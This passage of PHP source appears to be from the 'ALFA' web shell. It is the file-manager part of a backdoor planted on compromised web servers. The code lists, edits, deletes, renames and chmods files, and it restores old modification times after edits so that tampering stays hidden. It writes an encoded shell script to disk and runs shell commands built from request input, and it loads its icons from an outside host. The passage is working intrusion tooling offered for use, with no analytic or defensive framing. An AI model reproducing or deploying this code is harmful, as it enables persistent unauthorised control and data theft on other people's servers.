@chdir($GLOBALS['cwd']);
$zip->close();
__alert('>> '.$zipX.' << is created...');}}
}elseif($_COOKIE['alfa_act'] == 'unzip'&&isset($_COOKIE['alfa_f'])){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
foreach($_COOKIE['alfa_f'] as $f) {
if($zip->open($_COOKIE['alfa_c'].$f)){
$zip->extractTo($_COOKIE['alfa_cwd']);
$zip->close();}}}}
unset($_COOKIE['alfa_f']);
break;
default:
if(!empty($_POST['alfa1'])){
if(in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))){
__alfa_set_cookie('alfa_act', @$_POST['alfa1']);
__alfa_set_cookie('alfa_f', @serialize($_POST['f']));
__alfa_set_cookie('alfa_c', @$_POST['c']);
return;
}
}
break;
}
}
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
$path = explode('/', $res[1]);
array_pop($path);
$_POST['c'] = implode('/', $path);
}
$cmd_dir = false;
if($dirContent === false){
if(_alfa_can_runCommand(true,true)){
$tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];
@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
if(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")){
$bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";
$tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);
__alfa_set_cookie("alfachdir_bash", "true");
__alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);
}
$dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa '".addslashes(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd'])."'");
$dirContent = json_decode($dirContent, true);
if(is_array($dirContent)){
array_pop($dirContent);
$cmd_dir = true;
}else{
$dirContent = false;
}
}
}
alfahead();
AlfaNum(8,9,10,7,6,5,4);
$count_dirContent = @count($dirContent);
if($count_dirContent > 300){
@$_COOKIE["alfa_limited_files"] = 100;
}
$alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';
$alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;
$alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;
$alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';
$files_page_count = 1;
if($alfa_limited_files > 0){
$files_page_count = ceil($count_dirContent/$alfa_limited_files);
if($files_page_count > 1){
$files_page_count++;
}
}
echo '<div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\'alfa_sort_by\');" style="color:#25ff00;"><option value="name" '.($alfa_sort_by == 'name'?'selected':'').'>Name</option><option value="size" '.($alfa_sort_by == 'size'?'selected':'').'>Size</option><option value="modify" '.($alfa_sort_by == 'modify'?'selected':'').'>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\'alfa_filesman_direction\')" style="color:#25ff00;"><option value="asc" '.($alfa_filesman_direction == 'asc'?'selected':'').'>Ascending</option><option value="desc" '.($alfa_filesman_direction == 'desc'?'selected':'').'>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="'.$alfa_limited_files.'" oninput="this.value=this.value.replace(/[^0-9]/g,\'\');setCookie(\'alfa_limited_files\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">'.($count_dirContent-1).'</b></span></div><div class="header">';
if($dirContent == false){
echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
alfaFooter();
return;
}
global $sort;
$sort = array('name', 1);
if(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){
$sort[0] = $_COOKIE["alfa_sort_by"];
}
if(!empty($_POST['alfa1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
$sort = array($match[1], (int)$match[2]);
}
if($alfa_files_page_number > ($files_page_count-1)){
$alfa_files_page_number = 1;
}
$checkbox_rand = rand(11111, 99999);
echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table id='filemanager_table' width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk".$checkbox_rand."' onclick='checkBox(this);' class='chkbx'><label for='mchk".$checkbox_rand."'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
$dirs = $files = array();
$n = $count_dirContent;
if($n > $alfa_limited_files && $alfa_limited_files > 0){
$n = ($alfa_limited_files * $alfa_files_page_number);
if($n > $count_dirContent){
$n = $count_dirContent;
}
}
$i = 0;
if($alfa_limited_files > 0 && $alfa_files_page_number > 1){
$i = $alfa_limited_files * ($alfa_files_page_number - 1);
}
$page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);
$cmd_dir_backp = "";
for(;$i<$n;$i++){
if($cmd_dir){
$filename = $dirContent[$i]["name"];
$file_owner = $dirContent[$i]["owner"];
$file_group = $dirContent[$i]["group"];
$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
$file_size = $dirContent[$i]["size"];
if(substr($dirContent[$i]["name"], 0 ,1) == "/"){
$file_path = $dirContent[$i]["name"];
$dirContent[$i]["name"] = "..";
$filename = $dirContent[$i]["name"];
}else{
$file_path = $GLOBALS['cwd']."/".$dirContent[$i]["name"];
}
}else{
$filename =$dirContent[$i];
$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
$file_size = @filesize($GLOBALS['cwd'].$filename);
$file_path = $GLOBALS['cwd'].$filename;
}
$tmp = array('name' => $filename,
'path' => $file_path,
'modify' => $file_modify,
'perms' => $file_perm,
'size' => $file_size,
'owner' => $file_owner,
'group' => $file_group
);
if($filename == ".." && !$cmd_dir){
$tmp["path"] = str_replace("\\", "/", realpath($file_path));
}
if(!$cmd_dir){
if(@is_file($file_path)){
$arr_mrg = array('type' => 'file');
if(@is_link($file_path)){
$arr_mrg["link"] = readlink($tmp['path']);
}
$files[] = array_merge($tmp, $arr_mrg);
}elseif(@is_link($file_path)){
$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
}elseif(@is_dir($file_path)&& ($filename != ".")){
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
}else{
if($dirContent[$i]["type"]=="file"){
$files[] = array_merge($tmp, array('type' => 'file'));
}else{
if($dirContent[$i]["name"] != "."){
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
}
}
}
$GLOBALS['sort'] = $sort;
function alfaCmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, "alfaCmp");
usort($dirs, "alfaCmp");
if(isset($_COOKIE["alfa_filesman_direction"])&& !empty($_COOKIE["alfa_filesman_direction"])){
if($_COOKIE["alfa_filesman_direction"] == 'desc'){
$files = array_reverse($files);
$dirs = array_reverse($dirs);
}
}
$files = array_merge($dirs, $files);
$l=0;
$cc=0;
foreach($files as $f){
$f['name'] = htmlspecialchars($f['name']);
$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
$checkbox = 'checkbox_'.$checkbox_rand.$cc;
$raw_name = rawurlencode($f['name']);
$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
echo '<tr class="fmanager-row" id="tr_row_'.$cc.'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td id="td_row_'.$cc.'">'.$icon.'<div style="'.$style.'"><a row="'.$cc.'" id="id_'.$cc.'" class="main_name" onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');" href="#action=fileman&path='.$GLOBALS['cwd'].'&file='.$raw_name.'" fname="'.$raw_name.'" ftype="file" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"':'').'>'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" href="#action=fileman&path='.$f['path'].'" fname="'.$raw_name.'" ftype="folder" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"':'').'><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?(isset($f['link'])?'[L] ':'').alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a id="id_chmode_'.$cc.'" href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
$f['perms'].'</td><td><a id="id_rename_'.$cc.'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a id="id_touch_'.$cc.'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a id="id_edit_'.$cc.'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a id="id_download_'.$cc.'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a id="id_delete_'.$cc.'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
$l = $l?0:1;
$cc++;
}
echo "<tr id='filemanager_last_tr'><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='".htmlspecialchars(($GLOBALS['glob_chdir_false']?$_POST['c']:$GLOBALS['cwd']))."'>
<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste</option></select>
<input type='submit' value='>>'>
</form></table><div class='pages-holder'><div class='pages-number'>".$page_builder."</div></div></div></div>";
alfafooter();
}
function get_pagination_links($current_page, $total_pages){
$links = "";
if ($total_pages >= 1 && $current_page <= $total_pages) {
$links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\"><<</a>";
$selected_page = "";
if($current_page == 1){
$selected_page = " active-page-number";
}
$links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">1</a>";
$i = max(2, $current_page - 5);
if ($i > 2)
$links .= "<a class=\"page-number\">...</a>";
for (; $i < min($current_page + 6, $total_pages); $i++) {
if($i == $current_page){
$selected_page = " active-page-number";
}else{
$selected_page = "";
}
$links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$i}</a>";
}
if ($i != $total_pages)
$links .= "<a class=\"page-number\">...</a>";
$selected_page = " last-page-number";
if($current_page == $total_pages){
$selected_page .= " active-page-number";
}
$links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$total_pages}</a>";
$links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\">>></a>";
}
return $links;
}
function alfaFilesTools(){
alfahead();
echo '<div class="filestools" style="height: 100%;">';
if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
$alfa1_decoded = $_POST['alfa1'];
$chdir_fals = false;
if(!@chdir($_POST['c'])){
$chdir_fals = true;
$_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
$alfa_canruncmd = _alfa_can_runCommand(true,true);
if($alfa_canruncmd){
$slashed_alfa1 = addslashes($_POST['alfa1']);
$file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
$perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
}
}
if($_POST['alfa2'] == 'auto'){
if(is_array(@getimagesize($_POST['alfa1']))){
$_POST['alfa2'] = 'image';
}else{
$_POST['alfa2'] = 'view';
if($chdir_fals){
if($alfa_canruncmd){
$mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
$mimetype = $mime[1];
if(!empty($mimetype)){
if(strstr($mimetype, "image")){
$_POST['alfa2'] = 'image';
}
}
}
}
}
}
if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
if(@$_POST['alfa2'] == 'mkfile'){
$_POST['alfa1'] = trim($_POST['alfa1']);
if($chdir_fals&&$alfa_canruncmd){
if(_alfa_is_writable($_POST["c"])){
alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
$_POST['alfa2'] = "edit";
}
}
if(!@file_exists($_POST['alfa1'])){
$fp = @fopen($_POST['alfa1'], 'w');
if($fp){
$_POST['alfa2'] = "edit";
fclose($fp);
}
}else{
$_POST['alfa2'] = "edit";
}
}
if(!_alfa_file_exists(@$_POST['alfa1'])){
echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
alfaFooter();
return;
}
if($chdir_fals){
$filesize = $file_info[3];
$uid["name"] = $file_info[1];
$gid["name"] = $file_info[2];
$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
}else{
$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
if(!$uid&&!$gid){
$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
}
$permcolor = alfaPermsColor($_POST['alfa1']);
$filesize = @filesize($_POST['alfa1']);
if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
if(_alfa_can_runCommand()){
list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
}
}
}
if(substr($_POST['alfa1'], 0, 7) == "phar://"){
$alfa_file_directory = $_POST['alfa1'];
}else{
$alfa_file_directory = str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']);
}
echo '<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> '.htmlspecialchars(basename($alfa1_decoded)).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.dirname($alfa_file_directory).'</div>';
if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
if(!_alfa_is_dir($_POST['alfa1'])){
$m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
$ftype = "file";
}else{
$m = array('Chmod', 'Rename', 'Touch');
$ftype = "dir";
}
echo('<div>');
foreach($m as $v)
echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
echo '</div>';
switch($_POST['alfa2']){
case 'view':case 'edit':
@chdir($_POST['c']);
$disabled_btn = "";
if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
$disabled_btn = "disabled=disabled";
$disabled_btn_style= 'background: #ff0000;color: #fff;';
}
if(!empty($_POST['alfa3'])){
$_POST['alfa3'] = substr($_POST['alfa3'],1);
$time = @filemtime($_POST['alfa1']);
$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
if($chdir_fals&&$alfa_canruncmd){
$rname = $alfa1_decoded;
$randname = $rname.rand(111,9999);
$filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
if($fp = @__write_file($filepath ,$_POST['alfa3'])){
alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
}
}
if($fp){
echo 'Saved!<br>';
@touch($_POST['alfa1'],$time,$time);
}
}
echo '<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">'._alfa_load_ace_options("editor").'<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute(\'ace_id\')].getValue();editor(\''.addslashes($alfa1_decoded).'\',\'edit\',\'1\'+ace_val,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;" class="button ace-controler ace-save-btn" style="width: 100px;height: 33px;'.$disabled_btn_style.'" '.$disabled_btn.'>save</button></div><pre class="ml1 view_ml_content">';
echo htmlspecialchars(__read_file($_POST['alfa1']));
echo '</pre></div></div>';
break;
case 'highlight':
@chdir($_POST['c']);
if(@is_readable($_POST['alfa1'])){
echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
$code = @highlight_file($_POST['alfa1'],true);
echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
}
break;
case 'delete':
@chdir($_POST['c']);
if(@is_writable($_POST['alfa1'])||$GLOBALS["glob_chdir_false"]){
$deleted = true;
if(!@unlink($_POST['alfa1'])){
$deleted = false;
if($alfa_canruncmd){
if(_alfa_is_writable($_POST['alfa1'])){
alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
$deleted = true;
}
}
}
if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
break;
case 'chmod':
@chdir($_POST['c']);
if(!empty($_POST['alfa3'])){
$perms = 0;
for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
if(!@chmod($_POST['alfa1'], $perms)){
if($chdir_fals&&$alfa_canruncmd){
alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
echo('Success!');
}else{
echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
}else{echo('Success!');}
}
clearstatcache();
AlfaNum(8,9,10,7,6,5,4,2,1);
if($chdir_fals){
$file_perm = $file_info[5];
}else{
$file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
}
echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
break;
case 'hexdump':
@chdir($_POST['c']);
$c = __read_file($_POST['alfa1']);
$n = 0;
$h = array('00000000<br>','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0: $h[2] .= ' '; break;
case 9: $h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}$h[1] .= '<br>';
$h[2] .= "\n";
}
}
echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
break;
case 'rename':
@chdir($_POST['c']);
$alfa1_escape = addslashes($_POST["alfa1"]);
$alfa3_escape = addslashes($_POST["alfa3"]);
if(!empty($_POST['alfa3'])){
$cmd_rename = false;
if($chdir_fals&&$alfa_canruncmd){
if(_alfa_is_writable($_POST['alfa1'])){
$alfa1_escape = addslashes($alfa1_decoded);
alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
}else{
$cmd_rename = true;
}
}else{
$alfa1_escape = addslashes($_POST["alfa1"]);
}
if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";updateFileEditor("'.$alfa1_escape.'", "'.$alfa3_escape.'");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
}
echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
break;
case 'touch':
@chdir($_POST['c']);
if( !empty($_POST['alfa3']) ) {
$time = strtotime($_POST['alfa3']);
if($time){
$touched = false;
if($chdir_fals&&$alfa_canruncmd){
alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
$touched = true;
}
if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
echo 'Fail!';
else
echo 'Touched!';
} else echo 'Bad time format!';
}
clearstatcache();
echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
break;
case 'image':
@chdir($_POST['c']);
echo('<hr>');
$file = $_POST['alfa1'];
$image_info = @getimagesize($file);
if(is_array($image_info)||$chdir_fals){
$width = (int)$image_info[0];
$height = (int)$image_info[1];
if($chdir_fals&&$alfa_canruncmd){
$source = alfaEx("cat '".addslashes($file)."' | base64");
list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
$mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
$image_info['mime'] = $mime[1];
}else{
$source = __ZW5jb2Rlcg(__read_file($file, false));
}
$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
if($width > 800){$width = 800;}
echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
}
break;
}
echo '</div>';
alfaFooter();
}
function findicon($file,$type){
$s = 'http://solevisible.com/icons/';
$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
if($type!='file'){
return ($file=='..'?$s.'back.png':$s.'folder.png');
}else{
$ext = explode('.',$file);
$ext = end($ext);
$ext = strtolower($ext);
return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
}
}
function alfadlfile(){
if(isset($_POST['c'],$_POST['file'])){
$basename = rawurldecode(basename($_POST['file']));
$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
$alfa_canruncmd = _alfa_can_runCommand(true,true);
if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
header("Content-Type: application/octet-stream");
if($GLOBALS["glob_chdir_false"]){
